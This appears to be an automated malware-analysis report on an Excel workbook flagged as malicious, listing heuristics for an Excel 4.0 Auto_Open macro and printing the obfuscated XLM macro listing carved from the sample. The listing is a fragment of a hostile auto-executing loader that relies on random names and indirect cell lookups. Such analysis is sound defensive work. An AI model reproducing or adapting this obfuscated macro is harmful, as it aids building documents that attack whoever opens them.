MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6693 bytes |
SHA-256: a623a69eb47ce4249fd28d6492496b7a60875126c0da83a23db6065d2a87559f |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - cqGp
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C185
' 0018 23 LABEL : Cell Value, String Constant - BhWcgSJh len=0
' 0018 21 LABEL : Cell Value, String Constant - BxBMxg len=0
' 0018 22 LABEL : Cell Value, String Constant - fBPeREi len=0
' 0018 23 LABEL : Cell Value, String Constant - fcrEwXhW len=0
' 0018 21 LABEL : Cell Value, String Constant - gaGVbY len=0
' 0018 20 LABEL : Cell Value, String Constant - iDbyb len=0
' 0018 22 LABEL : Cell Value, String Constant - iDkxPlO len=0
' 0018 27 LABEL : Cell Value, String Constant - jwVZkWPSIgjM len=0
' 0018 25 LABEL : Cell Value, String Constant - KRBSschGtV len=0
' 0018 23 LABEL : Cell Value, String Constant - lOhOayac len=0
' 0018 20 LABEL : Cell Value, String Constant - lsnyY len=0
' 0018 25 LABEL : Cell Value, String Constant - nIxZGHhmSm len=0
' 0018 21 LABEL : Cell Value, String Constant - oksrDf len=0
' 0018 24 LABEL : Cell Value, String Constant - ORxmuNgQs len=0
' 0018 26 LABEL : Cell Value, String Constant - QYewakSgZMy len=0
' 0018 27 LABEL : Cell Value, String Constant - STARnbevUiWx len=0
' 0018 25 LABEL : Cell Value, String Constant - TirrQToaTc len=0
' 0018 20 LABEL : Cell Value, String Constant - TMKSt len=0
' 0018 20 LABEL : Cell Value, String Constant - wPZzX len=0
' 0018 23 LABEL : Cell Value, String Constant - yznknkAM len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' cqGp,P52,"",396.00000000000000000000
' cqGp,P53,"",958.00000000000000000000
' cqGp,P54,"",294.00000000000000000000
' cqGp,P55,"",805.00000000000000000000
' cqGp,P56,"",395.00000000000000000000
' cqGp,P57,"",-749.00000000000000000000
' cqGp,C89,"SET.NAME("yznknkAM",0+VALUE("0"))",""
' cqGp,C91,"SET.NAME("STARnbevUiWx",yznknkAM)",""
' cqGp,C93,"SET.NAME("QYewakSgZMy",yznknkAM)",""
' cqGp,C95,"SET.NAME("gaGVbY",COUNTA(lOhOayac))",""
' cqGp,C99,"SET.NAME("wPZzX",COUNTA(jwVZkWPSIgjM))",""
' cqGp,C101,[],""
' cqGp,C106,"SET.NAME("fBPeREi","")",""
' cqGp,C111,"STARnbevUiWx",""
' cqGp,C113,"SET.NAME("TMKSt",HLOOKUP("*",lOhOayac,STARnbevUiWx,FALSE))",""
' cqGp,C116,"BhWcgSJh",""
' cqGp,C121,"SET.NAME("BxBMxg",yznknkAM)",""
' cqGp,C124,[],""
' cqGp,C126,"BxBMxg",""
' cqGp,C130,"iDbyb",""
' cqGp,C133,"lsnyY",""
' cqGp,C136,"iDkxPlO",""
' cqGp,C140,"SET.NAME("TirrQToaTc",VALUE(HLOOKUP("*",jwVZkWPSIgjM,iDkxPlO,FALSE)))",""
' cqGp,C145,"oksrDf",""
' cqGp,C147,"fBPeREi",""
' cqGp,C152,"QYewakSgZMy",""
' cqGp,C156,NEXT(),""
' cqGp,C161,"KRBSschGtV",""
' cqGp,C166,[],""
' cqGp,C171,"ORxmuNgQs",""
' cqGp,C176,NEXT(),""
' cqGp,C180,RETURN(),""
' cqGp,C212,"SET.NAME("fcrEwXhW",C89)",""
' cqGp,C214,"lOhOayac",""
' cqGp,C216,"SET.NAME("jwVZkWPSIgjM",R50C14)",""
' cqGp,C219,"SET.NAME("ORxmuNgQs",230)",""
' cqGp,C224,"SET.NAME("nIxZGHhmSm",3)",""
' cqGp,C229,fcrEwXhW(),""
' cqGp,C230,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.